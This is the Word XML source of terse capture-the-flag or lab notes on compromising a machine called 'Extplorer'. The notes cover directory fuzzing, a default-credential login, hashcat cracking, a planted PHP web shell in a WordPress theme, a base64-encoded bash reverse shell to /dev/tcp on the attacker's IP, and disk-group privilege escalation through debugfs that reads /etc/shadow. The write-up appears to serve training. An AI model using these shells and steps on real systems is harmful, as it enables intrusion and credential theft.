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38CB6A7B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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00040126">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Extplorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4902971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D273D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273DE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D273DE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273DE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D273DE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D273DE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D273D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D273DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CA22C10" w14:textId="07BFDCA2" w:rsidR="00952CBB" w:rsidRDefault="00952CBB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1AE4FD32" w:rsidR="00843DCE" w:rsidRDefault="00952CBB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website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A1C5B7" w14:textId="004971B5" w:rsidR="00952CBB" w:rsidRDefault="00952CBB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ffuf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-u </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="001D2F40" w:rsidRPr="0084421C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip/FUZZ -w seclists/raft-small-words.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="485368F8" w14:textId="2C522EF8" w:rsidR="001D2F40" w:rsidRDefault="001D2F4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notice wp-includes = visit it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD75F33" w14:textId="53D65F96" w:rsidR="001D2F40" w:rsidRDefault="001D2F4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user or password  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303C0E23" w14:textId="55761342" w:rsidR="001D2F40" w:rsidRDefault="001D2F40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not find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anythings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C89D961" w14:textId="60434C8A" w:rsidR="00952CBB" w:rsidRDefault="001D2F4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go for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filemanager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there has login page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admin:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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7D1B3AF1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find exploit of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B118FA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congif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folder we find some passwords of admin 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dora</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D17F82C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paste to the folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98A984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hashcat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-m 3200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rockyou.txt - -force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAC1E9F" w14:textId="77777777" w:rsidR="00797C12" w:rsidRDefault="00797C12" w:rsidP="00797C1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-show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="1D51A568" w:rsidR="00843DCE" w:rsidRDefault="00797C1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obtain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doraemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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433CC14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ssh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dora@t_ip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but its fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228E84A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again move to the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26645499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in wp-content = themes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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="720E32D8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&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25C16A54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system($_REQUEST[‘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’]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818D4B0" w14:textId="77777777" w:rsidR="00797C12" w:rsidRPr="00E44B51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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA411F2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save it and visit it as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>/wp-content/theme/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index.php?cmd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</w:p>
    <w:p w14:paraId="2051389F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its work </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F5FF14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echo -n ‘bash -I &gt;&amp; /dev/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tcp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our_ip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/443 0&gt;&amp;1’ | base64 -w0 = copy it and paste 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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0647A1DF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echo paste | base64 -d| bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0519A84E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start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netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="445A65F8" w14:textId="77777777" w:rsidR="00797C12" w:rsidRDefault="00797C12" w:rsidP="00797C12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get the shell</w:t>
      </w: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5586E181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have password and we get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access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3285F392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find / -perm -4000 2&gt;/dev/null = we not find anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DDFC7B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ss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nltp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port start on 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2BEFB8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id we notice 6(disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02985B69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which is mainly because of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debugfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29F77E79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which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debugfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16BBABB3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ls -al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usr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sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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debugfs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see root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B69DF0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 disk group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linux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privsec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hacktricks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50D5C499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go to disk group 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hacltricks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33E3F534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df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see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ubuuntu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file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B429AA4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debugfs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file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55335BBF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are in it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5383E2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cat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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/shadow = we obtain the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7323E" w14:textId="19134FC9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h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shcat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it with  its -m 1800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F56C2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password explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C008F9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exit the shell of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debugfs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and go to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dora</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="222510A6" w14:textId="77777777" w:rsidR="006810C4" w:rsidRDefault="006810C4" w:rsidP="006810C4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su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root = pate new password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74E5973C" w:rsidR="00A311DF" w:rsidRPr="006810C4" w:rsidRDefault="006810C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 we obtain the proof.txt </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00681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34AB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="746E4276"/>
    <w:lvl w:ilvl="0" w:tplc="6AC210D0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30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40126"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="001A4114"/>
    <w:rsid w:val="001D2F40"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00460996"/>
    <w:rsid w:val="006810C4"/>
    <w:rsid w:val="00797C12"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00952CBB"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B6118F"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D273DE"/>
    <w:rsid w:val="00E44B51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_ip/FUZZ%20-w%20seclists/raft-small-words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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-02T17:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>